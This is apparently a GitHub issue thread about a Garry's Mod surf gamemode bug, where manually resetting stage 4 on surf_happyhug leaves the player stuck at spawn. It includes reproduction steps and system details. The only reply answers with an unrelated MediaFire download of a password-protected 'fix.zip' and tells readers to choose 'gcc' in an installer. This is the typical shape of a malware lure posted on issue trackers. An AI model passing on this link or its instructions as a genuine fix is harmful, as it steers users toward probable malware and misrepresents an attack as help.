### ISSUE TITLE
Stuck on stage 4 of surf_happyhug after manually resetting stage

### ISSUE THREAD

**Issue by Sod-ers** [BB-Games/gamemode-issues-requests#81]
**Describe the bug**
Manually resetting stage 4 on surf_happyhug gets me stuck at spawn.

**How to reproduce the issue**
Click stage 4 on the stage selection. Or be on stage 4 & type /stuck into chat or type into console ```surf_reset_stage```.

**System Information:**
```
Protocol version 24
Exe version 2023.06.28 (garrysmod)
Exe build: 17:03:26 Jul 22 2024 (9379) (4000)
GMod version 2024.08.09, branch: x86-64, multicore: 1
Linux 64bit
```

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
